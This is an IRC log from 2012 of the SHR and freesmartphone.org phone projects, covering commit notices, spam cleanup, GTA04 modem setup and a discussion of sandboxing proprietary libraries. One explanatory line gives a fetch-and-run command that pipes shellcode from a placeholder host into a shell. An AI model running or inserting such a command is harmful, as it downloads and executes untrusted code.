**** BEGIN LOGGING AT Tue Jul 17 02:59:58 2012
Jul 17 06:41:46 <CIA-69> SHR: 03Martin.Jansa 07meta-smartphone * r06911757edd4 10/meta-openmoko/recipes-kernel/linux/ (linux-gta04/om-gta04/defconfig linux-gta04_git.bb): meta-openmoko: upgrade to 3.4.5 and enable SECURITYFS to hide error from systemd about mounting /sys/kernel/security
Jul 17 06:41:57 <CIA-69> SHR: 03Martin.Jansa 07meta-smartphone * r293afad2bfb2 10/meta-shr/conf/distro/shr.conf: meta-shr: duplicate all BLACKLIST entries for both implementations of blacklist
Jul 17 09:06:24 <JaMa> 33 *loan* users on shr trac :/ killed :)
Jul 17 09:14:11 <JaMa> and another 200 cash/payday or whatever.. killing registrations is not enough when every spammer already has at least few accounts :/
Jul 17 09:19:24 <lindi-> SHR does not need funding? ;)
Jul 17 09:20:46 <JaMa> hehe :)
Jul 17 09:21:01 <JaMa> looks like every -[:digit:] is suspicious :)
Jul 17 10:01:12 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r6afbb97e1020 10/fsogsmd/src/bin/ (Makefile.am main.vala): fsogsmd: implement command line option to show version of fsogsmd
Jul 17 10:01:13 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r679403f551bd 10/fsoaudiod/src/bin/ (Makefile.am main.vala): fsoaudiod: add different command line options for testing and informational purpose
Jul 17 10:01:14 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r9116d52a85d1 10/fsodeviced/ (4 files in 2 dirs): fsodeviced: add different command line options for testing and informational purpose
Jul 17 10:01:15 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * rb15beb899caf 10/fsogsmd/ (7 files in 4 dirs): fsogsmd: lib: integrate mbpi access from fsodatad
Jul 17 10:01:17 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r59386cdba292 10/fsogsmd/src/bin/main.vala: fsogsmd: bin: correct command line option abbreveation
Jul 17 10:01:18 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r2de541d3a3a5 10/fsousaged/src/bin/main.vala: fsousaged: add different command line options for testing and informational purpose
Jul 17 10:01:20 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * ra4019a4a520d 10/fsotdld/ (4 files in 2 dirs): fsotdld: add different command line options for testing and informational purpose
Jul 17 10:01:22 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r4d6fd53c8977 10/fsogsmd/src/lib/mediatorhelpers.vala: fsogsmd: lib: reimplement gathering of operator name from mcc/mnc
Jul 17 11:05:19 <jeepingben> JaMa, don't forget absscam.  
Jul 17 11:05:43 <JaMa> he was the first :)
Jul 17 11:06:10 <jeepingben> excellent, I won't miss him.
Jul 17 11:09:49 <CIA-69> SHR: 03shr-devel 07buildhistory * r3a53c33ae755 10/packages/ (259 files in 259 dirs): packages: Build 201207171202 of shr 20120717 for machine om-gta02 on opmbuild
Jul 17 11:19:14 <CIA-69> freesmartphone.org: 03morphis 07cornucopia * r62210de0e200 10/fsogsmd/src/lib/at/atcall.vala: fsogsmd: lib: at: implement join of active and held calls
Jul 17 11:22:50 <CIA-69> SHR: 03Martin.Jansa 07meta-smartphone * rdb619f0b0e1b 10/meta-shr/conf/distro/include/preferred-shr-versions.inc: meta-shr: prefer eglibc-2.16
Jul 17 12:18:13 <CIA-69> SHR: 03shr-devel 07buildhistory * r7960600d6fc4 10/packages/ (259 files in 259 dirs): packages: Build 201207171331 of shr 20120717 for machine nokia900 on opmbuild
Jul 17 12:43:32 <paulk-desktop> hi
Jul 17 12:43:46 <paulk-desktop> I don't have the modem dev nodes on GTA04
Jul 17 12:44:23 <paulk-desktop> on 3.2.0
Jul 17 12:44:28 <paulk-desktop> with Replicant and with SHR
Jul 17 12:44:33 <GNUtoo-hplaptop> paulk-desktop, it's because they are probably created with udev
Jul 17 12:44:35 <GNUtoo-hplaptop> ah ok
Jul 17 12:45:11 <GNUtoo-hplaptop> paulk-desktop, I use autorev....so maybe that's because of that
Jul 17 12:45:26 <GNUtoo-hplaptop> autorev + lasterst git from all layers
Jul 17 12:45:50 <GNUtoo-hplaptop> paulk-desktop, what image do you have?
Jul 17 12:46:00 <paulk-desktop> I don't know about the rootfs
Jul 17 12:46:04 <paulk-desktop> it was on the sdcard
Jul 17 12:46:23 <paulk-desktop> but I guess it's http://build.shr-project.org/shr-2012.01/images/om-gta04/
Jul 17 12:46:28 <paulk-desktop> I took the kernel there for sure
Jul 17 12:46:44 <GNUtoo-hplaptop> let me boot the gta04
Jul 17 12:46:47 <paulk-desktop> fsogsmd complains it can't open /dev/ttyHS3
Jul 17 12:47:23 <GNUtoo-hplaptop> ah strange
Jul 17 12:47:31 <GNUtoo-hplaptop> I have ttyNAME
Jul 17 12:47:48 <paulk-desktop> I read newer SHR code, it shouldn't be ttyHS3
Jul 17 12:48:06 <paulk-desktop> but /dev/ttyHS_Modem
Jul 17 12:48:11 <GNUtoo-hplaptop> indeed
Jul 17 12:48:17 <paulk-desktop> but not with the 3.2 kernel
Jul 17 12:48:19 <GNUtoo-hplaptop> that is created by udev
Jul 17 12:48:21 <GNUtoo-hplaptop> ok
Jul 17 12:48:24 <paulk-desktop> yes I remember the thread
Jul 17 12:48:32 <paulk-desktop> so how come I don't have any node?
Jul 17 12:48:40 <GNUtoo-hplaptop> no idea
Jul 17 12:48:45 <GNUtoo-hplaptop> maybe you lack the kernel modules?
Jul 17 12:48:51 <paulk-desktop> there is "0af0:880 Option" in lsusb
Jul 17 12:48:56 <paulk-desktop> do you know what module it is?
Jul 17 12:49:46 <paulk-desktop> that may be it
Jul 17 12:49:52 <paulk-desktop> the modules on rootfs are for 3.2.14
Jul 17 12:49:55 <paulk-desktop> and I have 3.2.0
Jul 17 12:50:00 <GNUtoo-hplaptop> hso
Jul 17 12:50:03 <paulk-desktop> i'll get the matching rootfs and retry
Jul 17 12:51:29 <paulk-desktop> would it work as well builtin?
Jul 17 13:07:09 <paulk-desktop> ok now it works on SHR
Jul 17 13:07:28 <paulk-desktop> lsmod has hso module
Jul 17 13:19:46 <paulk-desktop> I have the nodes on replicant now
Jul 17 13:19:48 <paulk-desktop> thanks GNUtoo-hplaptop
Jul 17 13:55:53 <CIA-69> SHR: 03shr-devel 07buildhistory * rcb009dae4d92 10/packages/om_gta04-oe-linux-gnueabi/ (327 files in 327 dirs): packages: Build 201207171435 of shr 20120717 for machine om-gta04 on opmbuild
Jul 17 18:50:17 <paulk-desktop> morphis, hi
Jul 17 18:52:00 <morphis> paulk-desktop: heyho
Jul 17 18:52:01 <paulk-desktop> I'm starting to integrate GTA04 modem in Android, so currently I'm dealing with I/O. how much data does FSO asks when doing read() ?
Jul 17 18:52:24 <morphis> hm, let me take a look
Jul 17 18:52:54 <paulk-desktop> 'cause select won't return the number of available bits
Jul 17 18:54:29 <GNUtoo-desktop> paulk-desktop, so you finished audio and you're starting the modem?
Jul 17 18:54:36 <paulk-desktop> GNUtoo-desktop, that's right :
Jul 17 18:54:43 <morphis> paulk-desktop: 4096 bytes
Jul 17 18:54:44 <paulk-desktop> I still have handset detection left though
Jul 17 18:55:05 <GNUtoo-desktop> paulk-desktop, yes I want the headset detection so badly....for SHR too
Jul 17 18:55:06 <paulk-desktop> morphis, great, thanks
Jul 17 18:55:12 <Alex[sp3dev]> hi
Jul 17 18:55:15 <paulk-desktop> hi Alex[sp3dev]
Jul 17 18:55:25 <paulk-desktop> good news for you: I fixed data in ICS on samsung-ril
Jul 17 18:55:38 <paulk-desktop> and included your patches on top
Jul 17 18:55:42 <morphis> paulk-desktop: http://git.freesmartphone.org/?p=cornucopia.git;a=blob;f=fsogsmd/src/lib/at/atcommandqueue.vala;h=5dc4e153888d9a1ab0a1ffeedf104f60730c8b0e;hb=HEAD#l110
Jul 17 18:55:57 <Alex[sp3dev]> paulk-desktop: thanks. I will look at it later and test. We can probably refactor it and make an ifdef on RIL_VERSION so that we can build it on both ics and gb
Jul 17 18:56:13 <paulk-desktop> that's http://git.paulk.fr/gitweb/?p=samsung-ril.git;a=shortlog;h=refs/heads/ics-xmm6260
Jul 17 18:56:28 <Alex[sp3dev]> btw, you've missed the gps patch for tuna. morphis promised to merge it to github, but still hasn't done so
Jul 17 18:56:29 <paulk-desktop> I will see about how to handle both ICS and GB
Jul 17 18:56:45 <morphis> Alex[sp3dev]: ah yes, sorry about that
Jul 17 18:56:45 <paulk-desktop> ok
Jul 17 18:56:49 <morphis> Alex[sp3dev]: will do it right now
Jul 17 18:56:55 <Alex[sp3dev]> morphis: thanks
Jul 17 18:57:15 <paulk-desktop> I think we'll also need to find a way to include different device handlers for the different kernel versions in libsamsung-ipc too
Jul 17 18:57:28 <paulk-desktop> because for instance, at some point, I'll want galaxys2 to work with GB too
Jul 17 18:58:14 <morphis> Alex[sp3dev]: done
Jul 17 18:58:14 <Alex[sp3dev]> paulk-desktop: I think adapting 3.X kernel for GB is better. But again, since samsung can invent new crappy modem interface in post-ics updates, we need to think of that
Jul 17 18:58:21 <Alex[sp3dev]> morphis: ok, thanks
Jul 17 18:58:25 <paulk-desktop> yep
Jul 17 18:58:48 <morphis> Alex[sp3dev]: should I add your ssh public key for libsamsung-ipc?
Jul 17 18:59:17 <Alex[sp3dev]> morphis: probably not, I would prefer that paulk reviews and fixes my changes first
Jul 17 18:59:24 <morphis> ok
Jul 17 19:00:08 <Alex[sp3dev]> PaulFertser: hi
Jul 17 19:02:38 <PaulFertser> Alex[sp3dev]: hi :)
Jul 17 19:02:58 <Alex[sp3dev]> I wanted to ask PaulFertser as a very linux-knowledged person, but I would be grateful if others also have answers. Do you know of any software to isolate/sandbox proprietary dynamic libraries? like seccomp, but for libraries. I think since the linker knows about the address to which a library is loaded, the kernel can check program counter and thus know that the code being executed is untrusted
Jul 17 19:03:22 <Alex[sp3dev]> therefore, it should be possible to limit what a blob loaded inside a process running as root can do, right?
Jul 17 19:03:28 <lindi-> Alex[sp3dev]: uhm
Jul 17 19:03:40 <lindi-> Alex[sp3dev]: that's not possible
Jul 17 19:04:28 <lindi-> Alex[sp3dev]: when you call a function in the library it can modify stack and cause your program to e.g. do system("wget -O - http://example.com/shellcode | sh") instead of exiting normalyl
Jul 17 19:04:54 <lindi-> Alex[sp3dev]: what you suggest can be done in java but not really in C
Jul 17 19:06:47 <PaulFertser> I would imagine the only possibility would be to create a 'proxy library' that mimics the API and does some RPC calls to another process containing that blob that is fully sandboxed.
Jul 17 19:06:58 <lindi-> PaulFertser: yep
Jul 17 19:07:05 <Alex[sp3dev]> hm, indeed. so, no way to run untrusted code safely except for running it under a hypervisor and writing a wrapper library that would talk to the server in hypervisor via some rpc?
Jul 17 19:07:29 <Alex[sp3dev]> PaulFertser: you're reading my mind!
Jul 17 19:07:48 <PaulFertser> :)
Jul 17 19:07:59 <Alex[sp3dev]> PaulFertser: I'm doing this kind of thing for the GPS blob, but writing wrappers for everything seems like a boring task
Jul 17 19:08:32 <PaulFertser> Alex[sp3dev]: i thought you've already got gpsd with sirf protocol working ;)
Jul 17 19:09:23 <Alex[sp3dev]> PaulFertser: no, I only have the datasheet for the gps protocol. I will implement a FOSS driver some time later, but at work we decided to try isolating the proprietary blob for our project because that would probably be faster to do
Jul 17 19:10:33 <morphis> JaMa|Off: ping
Jul 17 19:11:11 <lindi-> Alex[sp3dev]: hmm, the gps protocol can't be _that_ complex?
Jul 17 19:11:26 <Alex[sp3dev]> still, xloader is signed by samsung and omap4460 is HS, so we can't build the chain of trust anyway until we build our own hardware and that is not currently possible.
Jul 17 19:12:50 <Alex[sp3dev]> lindi-: I think that implementing the whole gps driver (with AGPS, downloading XTRA and stuff like that) will take several weeks. probably 2-4 times more than writing a wrapper (which is a task for 2-3 days, I suppose)
Jul 17 19:13:14 <lindi-> Alex[sp3dev]: yeah sure agps takes some extra work
Jul 17 19:15:34 <JaMa|Off> morphis: pong
Jul 17 19:15:54 <PaulFertser> Alex[sp3dev]: what other libraries were you planning to use btw?
Jul 17 19:16:41 <PaulFertser> Alex[sp3dev]: also, why not do it another way: running full gpsd in sandbox?
Jul 17 19:18:05 <Alex[sp3dev]> PaulFertser: unfortunately, we'll have to use powervr graphics driver. which is potentially a huge security hole but we can't do anything about it. At least we've ported uboot and samsung RIL to have control over telephony on the app cpu side
Jul 17 19:18:44 <PaulFertser> Alex[sp3dev]: have you read the paper about attacking the BB cpu?
Jul 17 19:19:19 <Alex[sp3dev]> PaulFertser: could you give the link?
Jul 17 19:20:01 <PaulFertser> Alex[sp3dev]: http://laforge.gnumonks.org/weblog/2010/11/07#20101107-all_your_baseband_are_belong_to_us
Jul 17 19:22:52 <PaulFertser> Alex[sp3dev]: so, why not running full gpsd in a sandbox?
Jul 17 19:24:29 <Alex[sp3dev]> PaulFertser: well, the blob is not gpsd but an android library. It is loaded by system_server by default. I've not currently fully figured out how it is loaded, so maybe I'll find an easier way
Jul 17 19:24:56 <PaulFertser> Alex[sp3dev]: what's system_server and why gps data has to go via that? 
Jul 17 19:26:25 <PaulFertser> Alex[sp3dev]: (powervr driver) do those "military" apps you want to run require fancy opengl es etc? Why X on plain framebuffer is not enough?
Jul 17 19:26:27 <Alex[sp3dev]> PaulFertser: system_server is the daemon in android that loads hardware support libraries when java apps request them, as far as I understand
Jul 17 19:27:03 <PaulFertser> Alex[sp3dev]: ah, so you're planning to use android gps apps with it, i see. 
Jul 17 19:27:52 <Alex[sp3dev]> PaulFertser: android requires opengl. We want a daily-usable phone and to make sure we can disable security-critical hardware (gsm, microphone, accelerometers, gps) when needed
Jul 17 19:30:07 <morphis> JaMa: I have two patches for meta-smartphone sitting in my morphis/work branch: http://git.shr-project.org/git/?p=meta-smartphone.git;a=commit;h=afb54b29a742f67d8ff909cc8f5b2d317c42fad5 and http://git.shr-project.org/git/?p=meta-smartphone.git;a=commit;h=6ecb7bba764e6defce0c076281337741081fc64f
Jul 17 19:30:20 <morphis> JaMa: can you take a look at both and tell what you think about them
Jul 17 19:30:55 <morphis> JaMa: reason behind both is that I don't want xinput-calibrator in the image for the Nexus S
Jul 17 19:30:59 <morphis> as we don't need it
Jul 17 19:31:47 <PaulFertser> Alex[sp3dev]: a daily-usable android cellphone doesn't sound like a secure device no matter what you do. Imagine an application will log everything important (call logs, gps data etc) when those are not turned off and then send it out, it would be dangerous enough already.
Jul 17 19:32:20 <JaMa> morphis: is it only thing pulling xinput-calibrator to image? I would expect xserver-nodm-init to pull that too
Jul 17 19:32:30 <morphis> yes it does
Jul 17 19:32:39 <morphis> I meant xinput-calibrator-systemd
Jul 17 19:32:42 <JaMa> morphis: and now with new systemd.bbclass xinput-calibrator pulls also xinput-calibrator-systemd (from RRECOMMENDS)
Jul 17 19:32:49 <morphis> hm
Jul 17 19:34:17 <PaulFertser> Alex[sp3dev]: are you following the Qubes OS project? Their way of providing secure environment is not directly applicable to a smartphone but probably it might be beneficial to consider the security threats they describe.
Jul 17 19:34:24 <Alex[sp3dev]> PaulFertser: As I already told you, I have no idea what the final aim of the project is and who's going to continue the development after us. What we needed to do wat to reimplement some pieces of software. I guess we'll be building some software stack based on L4 later, but I don't know. For now, I'm just having fun getting paid to do some reverse-engineering and am happy that I can reuse some of my previous work and can
Jul 17 19:34:41 <Alex[sp3dev]> PaulFertser: I'm not following it but I plan to look at it
Jul 17 19:35:18 <morphis> JaMa: you have any idea how we can archive this another way?
Jul 17 19:35:44 <JaMa> morphis: I'll look after dinner
Jul 17 19:35:50 <morphis> ok
Jul 17 19:37:12 <Alex[sp3dev]> PaulFertser: have you looked at the genode project or l4linux? as I understand, one popular trend is to strip down linux to the minimum that would run a driver, then run this stripped kernel as a process under a L4 hypervisor and make every driver/trusted app run in a separate linux under the hv
Jul 17 19:38:39 <PaulFertser> Alex[sp3dev]: no, i haven't :(
Jul 17 19:39:38 <GNUtoo-desktop> Alex[sp3dev], what abuot seccomp filter?
Jul 17 19:39:43 <Alex[sp3dev]> PaulFertser: genode is an attempt to create a general-purpose OS that can have various microkernels as the backend. they've ported qt4 and some DRM driver (intel gallium, I think) and it works on top of L4 fiasco
Jul 17 19:39:50 <PaulFertser> Alex[sp3dev]: Qubes OS does something like that but using the Xen supervisor. And btw those folks involved seem to be real security experts.
Jul 17 19:39:51 <GNUtoo-desktop> https://lwn.net/Articles/475043/ ?
Jul 17 19:40:46 <Alex[sp3dev]> GNUtoo-desktop: seccomp is applied on a per-process basis and system_server loads not only gps library, but a lot of other code, so we need to either launch a standalone instance or write a wrapper library
Jul 17 19:40:58 <GNUtoo-desktop> ok
Jul 17 19:52:51 <Alex[sp3dev]> PaulFertser: I've read the report on the gsm security you showed me. Nothing new, of course (memcpy buffer overflow is what has pwned PS3 and is the most dangerous thing in programming at all because it overwrites the stack), but I still wonder if it is possible to build anything secure at all. I imagine using formal verification of everything from vhdl code and replacing C with something ML/Haskell like could help a bit,
Jul 17 19:59:15 <PaulFertser> Alex[sp3dev]: i meant that there's really too much too bad code running on BB too often.
Jul 17 20:01:08 <Alex[sp3dev]_> PaulFertser: luckily, on galaxy nexus and galaxy s2, the modem does not share RAM with the AP and is connected by a HSIC link
Jul 17 20:32:03 <JaMa> morphis: looking at where xinput-calibrator is pulled I don't see any easy way to remove it :/
Jul 17 21:36:07 <thamos> hello world
Jul 17 21:40:37 <paulk-desktop> another question about GTA04 modem: where must we write the outgoing data? Modem or Application node?
Jul 17 21:59:45 <GNUtoo-desktop> paulk-desktop, hmmm
Jul 17 21:59:59 <GNUtoo-desktop> paulk-desktop, the gta04 has more than one modem node....
Jul 17 21:59:59 <paulk-desktop> apparently it works on modem
Jul 17 22:00:12 <GNUtoo-desktop> which means that some stuff has to be done on one node
Jul 17 22:00:17 <paulk-desktop> yes, there is one called Modem and one called Application
Jul 17 22:00:17 <GNUtoo-desktop> and some other on another node
Jul 17 22:00:21 <GNUtoo-desktop> ok
Jul 17 22:00:32 <GNUtoo-desktop> so maybe read the fsogsmd option plugin source code...
Jul 17 22:00:48 <paulk-desktop> yes I tried but it's split in several layers with fsotransportd, etc
Jul 17 22:01:00 <GNUtoo-desktop> ok
Jul 17 22:04:31 <paulk-desktop> anyway, apparently, I have I/O setup correctly
Jul 17 22:04:59 <paulk-desktop> and it should handle sudden serial close
Jul 17 22:07:28 <paulk-desktop> ah the nodes are setup in config files in fsogsmd
Jul 17 22:07:36 <Alex[sp3dev]_> wow, I've been reading on omap4 and turns out there is open source example code to be run on the ducati and tesla (cortex m3 and c6000 dsp cores). gotta look into that
Jul 17 22:08:22 <GNUtoo-desktop> wow
Jul 17 22:10:45 <paulk-desktop> seems like it's writing all AT stuff on Modem node
Jul 17 22:24:07 <Alex[sp3dev]_> good night
Jul 17 23:46:44 <CIA-69> SHR: 03Martin.Jansa 07shr-chroot * r510658265a79 10/ (309 files in 42 dirs): system upgrade
Jul 17 23:46:55 <CIA-69> SHR: 03Martin.Jansa 07shr-chroot * r6d82758eee8d 10/ (928 files in 38 dirs): system upgrade
**** ENDING LOGGING AT Wed Jul 18 02:59:58 2012